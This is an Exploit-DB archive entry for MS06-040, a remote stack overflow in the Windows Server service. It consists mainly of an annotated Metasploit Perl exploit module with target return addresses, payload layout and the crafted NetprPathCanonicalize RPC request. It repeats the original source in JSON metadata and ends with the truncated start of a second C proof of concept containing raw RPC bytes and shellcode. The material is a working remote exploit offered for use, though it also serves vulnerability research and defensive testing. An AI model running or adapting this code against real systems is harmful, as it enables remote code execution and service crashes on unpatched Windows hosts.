Microsoft Windows - NetpIsRemote Remote Overflow Exploit MS06-040
2006-08-10T00:00:00
ID EDB-ID:2162 Type exploitdb Reporter H D Moore Modified 2006-08-10T00:00:00
Description
MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040). CVE-2006-3439. Remote exploit for windows platform
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::netapi_ms06_040;
use base "Msf::Exploit";
use strict;
use Pex::DCERPC;
use Pex::NDR;
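# Advanced (rarely changed) options exposed to the framework.
my $advanced = {
	'FragSize'    => [ 256, 'The DCERPC fragment size' ],
	'BindEvasion' => [ 0,   'IDS Evasion of the bind request' ],
	'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
};

# Module metadata consumed by Msf::Exploit via new() below.
#
# Operational caveat for practitioners: as the Description states, a failed
# attempt reboots Windows 2000 and kills the SMB-related services on XP, and
# XP SP2 / 2003 SP1 are only crashed, never exploited. Target 0 (Automatic)
# discriminates by major OS version only (see Exploit), so it cannot tell an
# XP SP0/SP1 box from an SP2 box before sending the request.
my $info = {
	# Fixed: the bulletin id was previously spelled with the letter O ("MSO6-040").
	'Name'    => 'Microsoft NetpIsRemote() MS06-040 Overflow',
	'Version' => '$Revision: 3715 $',
	'Authors' =>
	  [
		'H D Moore <hdm [at] metasploit.com>',
	  ],

	'Arch' => ['x86'],
	# win2003 is listed here, but no target entry exists for it; Automatic
	# detection reports "No target available" for anything other than
	# Windows 4.0/5.0/5.1.
	'OS'   => [ 'win32', 'win2000', 'winxp', 'win2003' ],
	# Presumably marks the payload as running with elevated privilege
	# (the Server service context) -- TODO confirm against the framework.
	'Priv' => 1,

	'AutoOpts' => { 'EXITFUNC' => 'thread' },

	'UserOpts' =>
	  {
		'RHOST' => [ 1, 'ADDR', 'The target address' ],

		# SMB connection options; all optional, so the default is a null
		# session, which is what the bulletin describes as the anonymous case.
		'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
		'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ],
		'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
	  },

	'Payload' =>
	  {
		# Technically we can use more space than this, but by limiting it
		# to 370 bytes we can use the same request for all Windows SPs.
		'Space' => 370,

		# NUL terminates the wide string; the remaining bytes are newline and
		# path-separator / dot characters, presumably because the
		# canonicalization routine would rewrite them -- TODO confirm.
		'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
		'Keys'     => ['+ws2ord'],

		# sub esp, 4097 + inc esp makes stack happy
		'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
	  },

	'Description' => Pex::Text::Freeform(
		qq{
		This module exploits a stack overflow in the NetApi32 NetpIsRemote() function
		using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that
		other RPC calls could be used to exploit this service. This exploit will result in
		a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt
		will likely result in a complete reboot on Windows 2000 and the termination of all
		SMB-related services on Windows XP. The default target for this exploit should succeed
		on Windows NT 4.0, Windows 2000 SP0-SP4+, and Windows XP SP0-SP1.
		}
	  ),

	'Refs' =>
	  [
		[ 'BID', '19409' ],
		[ 'CVE', '2006-3439' ],
		[ 'MSB', 'MS06-040' ],
	  ],

	'DefaultTarget' => 0,
	# Target tuple layout (see Exploit):
	#   [ name ]                                   -> automatic detection
	#   [ name, pad_len, ptr ]                     -> wcscpy method: pad_len bytes of
	#                                                 nops/payload, then ptr repeated
	#   [ name, ret_off, jmp_off, ret_addr ]       -> stack method: ret_addr written at
	#                                                 ret_off, a rel32 jmp at jmp_off
	'Targets' =>
	  [
		[ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)' ],
		[ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', 1000, 0x00020804 ],
		[ '(wcscpy) Windows XP SP0/SP1', 612, 0x00020804 ],
		[ '(stack) Windows XP SP1 English', 656, 680, 0x71ab1d54 ], # jmp esp @ ws2_32.dll
	  ],

	'Keys' => ['srvsvc'],

	'DisclosureDate' => 'Aug 08 2006',
};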
# Constructor. Hands the module metadata ($info) and the advanced option
# table ($advanced) to the framework base class. @_ is forwarded unchanged
# (it still begins with $class), exactly as the original call did.
sub new {
	my ($class) = @_;
	my %framework_args = (
		'Info'     => $info,
		'Advanced' => $advanced,
	);
	my $self = $class->SUPER::new( \%framework_args, @_ );
	return $self;
}
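# Entry point called by the framework once options are set.
#
# Flow: bind to the srvsvc interface over SMB, pick a concrete target (for
# the Automatic target, by the peer's announced native OS), build the
# NetprPathCanonicalize (opnum 0x1f) request whose path argument overflows
# the stack buffer, send it, and interpret a returned stub as "not exploited".
#
# Changes from the original:
#   - unused locals ($target_port, $target_name, $res, $rpc) dropped;
#   - the computed $FragSize (with its 256 fallback) is now actually passed
#     to Pex::DCERPC instead of the raw, possibly empty, option value;
#   - the identical stub-packaging code in the three target branches is
#     factored into _build_stub(), keeping the same rand() call order.
sub Exploit {
	my ($self) = @_;

	my $target_host = $self->GetVar('RHOST');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;

	# Fall back to the advanced-option default if the option is unset/empty.
	my $FragSize = $self->GetVar('FragSize') || 256;
	my $target   = $self->Targets->[$target_idx];

	if (!$self->InitNops(128)) {
		$self->PrintLine("Could not initialize the nop module");
		return;
	}

	# srvsvc interface, reached over the \BROWSER named pipe.
	my $pipe    = '\BROWSER';
	my $uuid    = '4b324fc8-1670-01d3-1278-5a47bf6ee188';
	my $version = '3.0';

	my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );

	# Credentials default to '' (null session) when the SMB* options are unset.
	my $dce = Pex::DCERPC->new(
		'handle'      => $handle,
		'username'    => $self->GetVar('SMBUSER'),
		'password'    => $self->GetVar('SMBPASS'),
		'domain'      => $self->GetVar('SMBDOM'),
		'fragsize'    => $FragSize,
		'bindevasion' => $self->GetVar('BindEvasion'),
		'directsmb'   => $self->GetVar('DirectSMB'),
	);

	if ( !$dce ) {
		$self->PrintLine("[*] Could not bind to $handle");
		return;
	}

	my $smb = $dce->{'_handles'}{$handle}{'connection'};
	if (! $smb) {
		$self->PrintLine("[*] Could not establish SMB session");
		return;
	}

	#
	# Automatic target selection. Only the major version announced in the
	# SMB native-OS string is available here, so service-pack level cannot
	# be determined: an XP SP2 host is indistinguishable from SP0/SP1 and
	# will only be crashed by the request.
	#
	if ( $target->[0] =~ /Automatic/ ) {
		my $peer_os = $smb->PeerNativeOS;

		if ( $peer_os eq 'Windows 5.0' ) {
			$target = $self->Targets->[1];
			$self->PrintLine('[*] Detected a Windows 2000 target');
		}
		elsif ( $peer_os eq 'Windows 5.1' ) {
			$target = $self->Targets->[2];
			$self->PrintLine('[*] Detected a Windows XP target');
			$self->PrintLine('[*] This will not work on SP2!');
		}
		elsif ( $peer_os eq 'Windows 4.0' ) {
			# NOTE(review): the later Ruby port of this module matches
			# 'Windows NT 4.0' here; confirm which native-OS string an NT 4.0
			# server actually announces, otherwise this branch never fires.
			$target = $self->Targets->[1];
			$self->PrintLine('[*] Detected a Windows NT 4.0 target');
			$self->PrintLine('[*] Please email us with the results!');
		}
		else {
			$self->PrintLine('[*] No target available for ' . $peer_os );
			return;
		}
	}

	#
	# /* Function 0x1f at 0x767e912c */
	# long function_1f (
	#   [in] [unique] [string] wchar_t * arg_00,
	#   [in] [string] wchar_t * arg_01,
	#   [out] [size_is(arg_03)] char * arg_02,
	#   [in] [range(0, 64000)] long arg_03,
	#   [in] [string] wchar_t * arg_04,
	#   [in,out] long * arg_05,
	#   [in] long arg_06
	# );
	#
	my $stub;

	#
	# Use the wcscpy() method on NT 4.0 / 2000 (target tuple: [name, pad_len, ptr])
	#
	if ($target->[0] =~ /2000/ && ! $target->[3]) {

		# Pad our shellcode out with nops so the path reaches pad_len bytes
		$shellcode = $self->MakeNops($target->[1] - length($shellcode)) . $shellcode;

		# Stick it into a path: payload, then the pointer value repeated 16 times
		my $path = $shellcode . (pack('V', $target->[2]) x 16) . "\x00\x00";

		# arg_04 carries a 2-byte short jump ("jmp $+4") on this target
		$stub = _build_stub(
			$path,
			Pex::NDR::UnicodeConformantVaryingStringPreBuilt( "\xeb\x02" . "\x00\x00" ),
		);

	#
	# Use the wcscpy() method on XP SP0/SP1 (target tuple: [name, pad_len, ptr])
	#
	} elsif ($target->[0] =~ /XP/ && ! $target->[3]) {

		my $path =
			# Shellcode (corrupted ~420 bytes in)
			$shellcode.
			# Padding
			Pex::Text::AlphaNumText($target->[1] - length($shellcode)).
			# Land 6 bytes in to bypass garbage (XP SP0)
			pack('V', $target->[2] + 6).
			# Padding
			Pex::Text::AlphaNumText(8).
			# Address to write our shellcode (XP SP0)
			pack('V', $target->[2]).
			# Padding (required)
			Pex::Text::AlphaNumText(32).
			# Jump straight to shellcode (XP SP1)
			pack('V', $target->[2]).
			# Padding
			Pex::Text::AlphaNumText(8).
			# Address to write our shellcode (XP SP1)
			pack('V', $target->[2]).
			# Padding (required)
			Pex::Text::AlphaNumText(32).
			# Terminate
			"\x00\x00";

		$stub = _build_stub( $path, Pex::NDR::UnicodeConformantVaryingString('') );

	#
	# Use the stack overflow method if a return address is set
	# (target tuple: [name, ret_off, jmp_off, ret_addr])
	#
	} elsif( $target->[3]) {

		my $buff = Pex::Text::AlphaNumText(800);
		# Payload at the start of the buffer
		substr($buff, 0, length($shellcode), $shellcode);
		# Saved return address slot <- ret_addr (jmp esp in ws2_32.dll)
		substr($buff, $target->[1], 4, pack('V', $target->[3]));
		# rel32 backward jmp at jmp_off; pack('V') wraps the negative displacement
		substr($buff, $target->[2], 5, "\xe9" . pack('V', ($target->[1] + 5) * -1 ));

		# Leading "\\" wide character, then the buffer, then the terminator
		my $path = "\\\x00\\\x00". $buff. "\x00\x00";

		$stub = _build_stub( $path, Pex::NDR::UnicodeConformantVaryingString('') );

	} else {
		$self->PrintLine("This target is not currently supported");
		return;
	}

	$self->PrintLine("[*] Sending request...");

	# Function 0x1f is not the only way to exploit this :-)
	my @response = $dce->request( $handle, 0x1f, $stub );

	# A returned stub means the call completed normally, i.e. the overflow
	# did not take the service down; the same request is retried once.
	if ( length($dce->{'response'}->{'StubData'}) > 0) {
		$self->PrintLine("[*] The server rejected it, trying again...");
		@response = $dce->request( $handle, 0x1f, $stub );
	}

	# NOTE(review): this message names SP1 although XP SP1 is a listed
	# target; presumably "SP2" alone was meant -- confirm before editing.
	if ( length($dce->{'response'}->{'StubData'}) > 0) {
		$self->PrintLine("[*] This system may be patched or running Windows XP SP1 or SP2");
	}

	if (@response) {
		$self->PrintLine('[*] RPC server responded with:');
		foreach my $line (@response) {
			$self->PrintLine( '[*] ' . $line );
		}
	}

	return;
}

# Package the opnum 0x1f request stub, following the IDL sketch in Exploit:
#   arg_00  unique pointer (random referent id) to an empty wide string
#   arg_01  the pre-built path wide string ($path) -- the overflowing argument
#   arg_03  output buffer size, random 1..250
#   arg_04  caller-supplied, already NDR-encoded wide string ($arg4_encoded)
#   arg_05  [in,out] long, random 1..250
#   arg_06  0
# arg_02 is [out] only and so is absent from the request. The random values
# are presumably just noise to vary the request on the wire. rand() is called
# in the same order as the original inline code.
sub _build_stub {
	my ($path, $arg4_encoded) = @_;
	return
		Pex::NDR::Long(int(rand(0xffffffff))).
		Pex::NDR::UnicodeConformantVaryingString('').
		Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
		Pex::NDR::Long(int(rand(250)+1)).
		$arg4_encoded.
		Pex::NDR::Long(int(rand(250)+1)).
		Pex::NDR::Long(0);
}

1;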
# milw0rm.com [2006-08-10]
{"id": "EDB-ID:2162", "hash": "b85faea797adafde9696455d8ade6e9f", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Microsoft Windows - NetpIsRemote Remote Overflow Exploit MS06-040", "description": "MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040). CVE-2006-3439. Remote exploit for windows platform", "published": "2006-08-10T00:00:00", "modified": "2006-08-10T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/2162/", "reporter": "H D Moore", "references": [], "cvelist": ["CVE-2006-3439"], "lastseen": "2016-01-31T15:39:27", "history": [], "viewCount": 65, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-3439"]}, {"type": "cert", "idList": ["VU:650769"]}, {"type": "exploitdb", "idList": ["EDB-ID:2265", "EDB-ID:2355", "EDB-ID:2223", "EDB-ID:16367"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS06_040_NETAPI"]}, {"type": "nessus", "idList": ["SMB_NT_MS06-040.NASL", "SMB_KB921883.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:13789"]}, {"type": "saint", "idList": ["SAINT:196A97F73EEF3B5D1EFCFB0026B813A8", "SAINT:FAA2D7963586117985DEDCB8ABB67809", "SAINT:CF84C615CA476A001FFE4FD66C27D477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82940"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310902782"]}, {"type": "osvdb", "idList": ["OSVDB:27845"]}, {"type": "canvas", "idList": ["MS06_040"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}], "modified": "2016-01-31T15:39:27"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/2162/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. 
In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\npackage Msf::Exploit::netapi_ms06_040;\r\nuse base \"Msf::Exploit\";\r\nuse strict;\r\n\r\nuse Pex::DCERPC;\r\nuse Pex::NDR;\r\n\r\nmy $advanced = {\r\n\t'FragSize' => [ 256, 'The DCERPC fragment size' ],\r\n\t'BindEvasion' => [ 0, 'IDS Evasion of the bind request' ],\r\n\t'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ],\r\n };\r\n\r\nmy $info = {\r\n\t'Name' => 'Microsoft NetpIsRemote() MSO6-040 Overflow',\r\n\t'Version' => '$Revision: 3715 $',\r\n\t'Authors' =>\r\n\t [\r\n\t\t'H D Moore <hdm [at] metasploit.com>',\r\n\t ],\r\n\r\n\t'Arch' => ['x86'],\r\n\t'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],\r\n\t'Priv' => 1,\r\n\r\n\t'AutoOpts' => { 'EXITFUNC' => 'thread' },\r\n\t\r\n\t'UserOpts' =>\r\n\t {\r\n\t\t'RHOST' => [ 1, 'ADDR', 'The target address' ],\r\n\r\n\t\t# SMB connection options\r\n\t\t'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],\r\n\t\t'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ],\r\n\t\t'SMBDOM' => [ 0, 'DATA', 'The domain for specified SMB username', '' ],\r\n\t },\r\n\r\n\t'Payload' =>\r\n\t {\r\n\t \t# Technically we can use more space than this, but by limiting it\r\n\t\t# to 370 bytes we can use the same request for all Windows SPs.\r\n\t\t'Space' => 370,\r\n\t\t\r\n\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\r\n\t\t'Keys' => ['+ws2ord'],\r\n\r\n\t\t# sub esp, 4097 + inc esp makes stack happy\r\n\t\t'Prepend' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\r\n\t },\r\n\r\n\t'Description' => Pex::Text::Freeform(\r\n\t\tqq{\r\n This module exploits a stack overflow in the NetApi32 NetpIsRemote() function\r\n\t\tusing the NetpwPathCanonicalize RPC call in the Server Service. 
It is likely that\r\n\t\tother RPC calls could be used to exploit this service. This exploit will result in\r\n\t\ta denial of service on on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt\r\n\t\twill likely result in a complete reboot on Windows 2000 and the termination of all \r\n\t\tSMB-related services on Windows XP. The default target for this exploit should succeed\r\n\t\ton Windows NT 4.0, Windows 2000 SP0-SP4+, and Windows XP SP0-SP1.\r\n\t }\r\n\t ),\r\n\r\n\t'Refs' =>\r\n\t [\r\n\t\t[ 'BID', '19409' ],\r\n\t\t[ 'CVE', '2006-3439' ],\r\n\t\t[ 'MSB', 'MS06-040' ],\r\n\t ],\r\n\r\n\t'DefaultTarget' => 0,\r\n\t'Targets' =>\r\n\t [\r\n\t \t[ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)' ],\r\n\t\t[ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', 1000, 0x00020804 ],\r\n\t\t[ '(wcscpy) Windows XP SP0/SP1', 612, 0x00020804 ],\r\n\t\t[ '(stack) Windows XP SP1 English', 656, 680, 0x71ab1d54], # jmp esp @ ws2_32.dll\r\n\t ],\r\n\r\n\t'Keys' => ['srvsvc'],\r\n\r\n\t'DisclosureDate' => 'Aug 08 2006',\r\n };\r\n\r\nsub new {\r\n\tmy ($class) = @_;\r\n\tmy $self =\r\n\t $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );\r\n\treturn ($self);\r\n}\r\n\r\nsub Exploit {\r\n\tmy ($self) = @_;\r\n\tmy $target_host = $self->GetVar('RHOST');\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\tmy $target_idx = $self->GetVar('TARGET');\r\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\r\n\tmy $target_name = '*SMBSERVER';\r\n\r\n\tmy $FragSize = $self->GetVar('FragSize') || 256;\r\n\tmy $target = $self->Targets->[$target_idx];\r\n\r\n\tif (!$self->InitNops(128)) {\r\n\t\t$self->PrintLine(\"Could not initialize the nop module\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tmy ( $res, $rpc );\r\n\r\n\tmy $pipe = '\\BROWSER';\r\n\tmy $uuid = '4b324fc8-1670-01d3-1278-5a47bf6ee188';\r\n\tmy $version = '3.0';\r\n\r\n\tmy $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );\r\n\r\n\tmy $dce = 
Pex::DCERPC->new(\r\n\t\t'handle' => $handle,\r\n\t\t'username' => $self->GetVar('SMBUSER'),\r\n\t\t'password' => $self->GetVar('SMBPASS'),\r\n\t\t'domain' => $self->GetVar('SMBDOM'),\r\n\t\t'fragsize' => $self->GetVar('FragSize'),\r\n\t\t'bindevasion' => $self->GetVar('BindEvasion'),\r\n\t\t'directsmb' => $self->GetVar('DirectSMB'),\r\n\t );\r\n\r\n\tif ( !$dce ) {\r\n\t\t$self->PrintLine(\"[*] Could not bind to $handle\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tmy $smb = $dce->{'_handles'}{$handle}{'connection'};\r\n\t\r\n\tif (! $smb) {\r\n\t\t$self->PrintLine(\"[*] Could not establish SMB session\");\r\n\t\treturn;\r\n\t}\r\n\r\n if ( $target->[0] =~ /Automatic/ ) {\r\n if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {\r\n $target = $self->Targets->[1];\r\n $self->PrintLine('[*] Detected a Windows 2000 target');\r\n }\r\n elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {\r\n $target = $self->Targets->[2];\r\n $self->PrintLine('[*] Detected a Windows XP target');\r\n\t\t\t$self->PrintLine('[*] This will not work on SP2!');\r\n }\r\n elsif ( $smb->PeerNativeOS eq 'Windows 4.0' ) {\r\n $target = $self->Targets->[1];\r\n $self->PrintLine('[*] Detected a Windows NT 4.0 target');\r\n\t\t\t$self->PrintLine('[*] Please email us with the results!');\r\n }\t\t\r\n else {\r\n $self->PrintLine('[*] No target available for ' . $smb->PeerNativeOS() );\r\n return;\r\n }\r\n }\r\n\t\t\r\n\t#\r\n\t# /* Function 0x1f at 0x767e912c */\r\n\t# long function_1f (\r\n\t# [in] [unique] [string] wchar_t * arg_00,\r\n\t# [in] [string] wchar_t * arg_01,\r\n\t# [out] [size_is(arg_03)] char * arg_02,\r\n\t# [in] [range(0, 64000)] long arg_03,\r\n\t# [in] [string] wchar_t * arg_04,\r\n\t# [in,out] long * arg_05,\r\n\t# [in] long arg_06\r\n\t# );\r\n\t#\r\n\t\r\n\tmy $stub;\r\n\r\n\t#\r\n\t# Use the wcscpy() method on NT 4.0 / 2000\r\n\t#\t\r\n\tif ($target->[0] =~ /2000/ && ! 
$target->[3]) {\r\n\t\r\n\t\t# Pad our shellcode out with nops\r\n\t\t$shellcode = $self->MakeNops($target->[1] - length($shellcode)) . $shellcode;\r\n\t\r\n\t\t# Stick it into a path\r\n\t\tmy $path = \t$shellcode . (pack('V', $target->[2]) x 16) . \"\\x00\\x00\";\r\n\r\n\t\t# Package that into a stub\r\n\t\t$stub =\r\n\t\t\tPex::NDR::Long(int(rand(0xffffffff))).\r\n\t\t\tPex::NDR::UnicodeConformantVaryingString('').\r\n\t\t\tPex::NDR::UnicodeConformantVaryingStringPreBuilt($path).\r\n\t\t\tPex::NDR::Long(int(rand(250)+1)).\r\n\t\t\tPex::NDR::UnicodeConformantVaryingStringPreBuilt( \"\\xeb\\x02\" . \"\\x00\\x00\").\r\n\t\t\tPex::NDR::Long(int(rand(250)+1)).\r\n\t\t\tPex::NDR::Long(0);\t\r\n\t#\r\n\t# Use the wcscpy() method on XP SP0/SP1\r\n\t#\t\r\n\t} elsif ($target->[0] =~ /XP/ && ! $target->[3]) {\r\n\r\n\t\t# XP SP0/SP1\r\n\t\tmy $path = \t\r\n\t\t\t# Shellcode (corrupted ~420 bytes in)\r\n\t\t\t$shellcode.\r\n\t\t\t# Padding\r\n\t\t\tPex::Text::AlphaNumText($target->[1] - length($shellcode)).\r\n\t\t\t# Land 6 bytes in to bypass garbage (XP SP0)\r\n\t\t\tpack('V', $target->[2] + 6).\r\n\t\t\t# Padding\r\n\t\t\tPex::Text::AlphaNumText(8).\r\n\t\t\t# Address to write our shellcode (XP SP0)\r\n\t\t\tpack('V', $target->[2]).\r\n\t\t\t# Padding (required)\r\n\t\t\tPex::Text::AlphaNumText(32).\r\n\t\t\t# Jump straight to shellcode (XP SP1)\r\n\t\t\tpack('V', $target->[2]).\r\n\t\t\t# Padding\r\n\t\t\tPex::Text::AlphaNumText(8).\t\t\t\t\t\t\r\n\t\t\t# Address to write our shellcode (XP SP1)\r\n\t\t\tpack('V', $target->[2]).\r\n\t\t\t# Padding (required)\r\n\t\t\tPex::Text::AlphaNumText(32).\t\t\t\r\n\t\t\t# Terminate\r\n\t\t\t\"\\x00\\x00\";\r\n\r\n\t\t# Package that into a stub\r\n\t\t$stub 
=\r\n\t\t\tPex::NDR::Long(int(rand(0xffffffff))).\r\n\t\t\tPex::NDR::UnicodeConformantVaryingString('').\r\n\t\t\tPex::NDR::UnicodeConformantVaryingStringPreBuilt($path).\r\n\t\t\tPex::NDR::Long(int(rand(250)+1)).\r\n\t\t\tPex::NDR::UnicodeConformantVaryingString('').\r\n\t\t\tPex::NDR::Long(int(rand(250)+1)).\r\n\t\t\tPex::NDR::Long(0);\r\n\r\n\t#\r\n\t# Use the stack overflow method if a return address is set\r\n\t#\r\n\t} elsif( $target->[3]) {\r\n\r\n\t\tmy $buff = Pex::Text::AlphaNumText(800);\r\n\t\tsubstr($buff, 0, length($shellcode), $shellcode);\r\n\t\tsubstr($buff, $target->[1], 4, pack('V', $target->[3]));\r\n\t\tsubstr($buff, $target->[2], 5, \"\\xe9\" . pack('V', ($target->[1] + 5) * -1 ));\r\n\t\t\r\n\t\tmy $path = \"\\\\\\x00\\\\\\x00\". $buff. \"\\x00\\x00\";\r\n\r\n\t\t# Package that into a stub\r\n\t\t$stub =\r\n\t\t\tPex::NDR::Long(int(rand(0xffffffff))).\r\n\t\t\tPex::NDR::UnicodeConformantVaryingString('').\r\n\t\t\tPex::NDR::UnicodeConformantVaryingStringPreBuilt($path).\r\n\t\t\tPex::NDR::Long(int(rand(250)+1)).\r\n\t\t\tPex::NDR::UnicodeConformantVaryingString('').\r\n\t\t\tPex::NDR::Long(int(rand(250)+1)).\r\n\t\t\tPex::NDR::Long(0);\r\n\t} else {\r\n\t\t$self->PrintLine(\"This target is not currently supported\");\r\n\t\treturn;\r\n\t}\r\n\r\n\r\n\t$self->PrintLine(\"[*] Sending request...\");\r\n\t\r\n\t# Function 0x1f is not the only way to exploit this :-)\r\n\tmy @response = $dce->request( $handle, 0x1f, $stub );\r\n\t\r\n\tif ( length($dce->{'response'}->{'StubData'}) > 0) {\r\n\t\t$self->PrintLine(\"[*] The server rejected it, trying again...\");\r\n\t\t@response = $dce->request( $handle, 0x1f, $stub );\r\n\t}\r\n\t\r\n\tif ( length($dce->{'response'}->{'StubData'}) > 0) {\r\n\t\t$self->PrintLine(\"[*] This system may be patched or running Windows XP SP1 or SP2\");\r\n\t}\r\n\t\r\n\tif (@response) {\r\n\t\t$self->PrintLine('[*] RPC server responded with:');\r\n\t\tforeach my $line (@response) {\r\n\t\t\t$self->PrintLine( '[*] ' . 
$line );\r\n\t\t}\r\n\t}\r\n\r\n\treturn;\r\n}\r\n\r\n1;\r\n\r\n# milw0rm.com [2006-08-10]\r\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2018-10-13T12:04:35", "bulletinFamily": "NVD", "description": "Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314.", "modified": "2018-10-12T17:40:34", "published": "2006-08-08T21:04:00", "id": "CVE-2006-3439", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3439", "title": "CVE-2006-3439", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T15:53:02", "bulletinFamily": "exploit", "description": "MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2). CVE-2006-3439. Remote exploit for windows platform", "modified": "2006-08-28T00:00:00", "published": "2006-08-28T00:00:00", "id": "EDB-ID:2265", "href": "https://www.exploit-db.com/exploits/2265/", "type": "exploitdb", "title": "Microsoft Windows - NetpIsRemote Remote Overflow Exploit MS06-040 2", "sourceData": "/*\r\n * MS06-040 Remote Code Execution Proof of Concept\r\n *\r\n * Ported by ub3r st4r aka iRP\r\n * ---------------------------------------------------------------------\r\n * Tested Against:\r\n * Windows XP SP1\r\n * Windows 2000 SP4\r\n *\r\n * Systems Affected:\r\n * Microsoft Windows 2000 SP0-SP4\r\n * Microsoft Windows XP SP0-SP1\r\n * Microsoft Windows NT 4.0\r\n * ---------------------------------------------------------------------\r\n * This is provided as proof-of-concept code only for educational\r\n * purposes and testing by authorized individuals with permission\r\n * to do so.\r\n *\r\n * PRIVATE v.0.2 (08-27-06)\r\n */\r\n\r\n#include <stdio.h>\r\n#include <windows.h>\r\n\r\n#pragma comment(lib, \"mpr\")\r\n#pragma comment(lib, \"Rpcrt4\")\r\n\r\n// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0\r\nunsigned char 
DCERPC_Bind_RPC_Service[] =\r\n \"\\x05\\x00\\x0B\\x03\\x10\\x00\\x00\\x00\\x48\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n \"\\xD0\\x16\\xD0\\x16\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\r\n \"\\xC8\\x4F\\x32\\x4B\\x70\\x16\\xD3\\x01\\x12\\x78\\x5A\\x47\\xBF\\x6E\\xE1\\x88\"\r\n \"\\x03\\x00\\x00\\x00\\x04\\x5D\\x88\\x8A\\xEB\\x1C\\xC9\\x11\\x9F\\xE8\\x08\\x00\"\r\n \"\\x2B\\x10\\x48\\x60\\x02\\x00\\x00\\x00\";\r\n\r\n// request windows api: NetprPathCanonicalize (0x1f)\r\nunsigned char DCERPC_Request_RPC_Service[] =\r\n \"\\x05\\x00\\x00\\x03\\x10\\x00\\x00\\x00\\x30\\x08\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n \"\\x18\\x08\\x00\\x00\\x00\\x00\\x1f\\x00\\xff\\xff\\xff\\xff\\x01\\x00\\x00\\x00\"\r\n \"\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\r\n\r\n // path ...\r\n\r\nunsigned char DCERPC_Request_RPC_Service_[] =\r\n \"\\xfa\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\"\r\n \"\\x00\\x00\\x00\\x00\\xfa\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\r\n\r\nunsigned char sc[] =\r\n \"\\x6a\\x51\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xa8\\x97\\x90\"\r\n 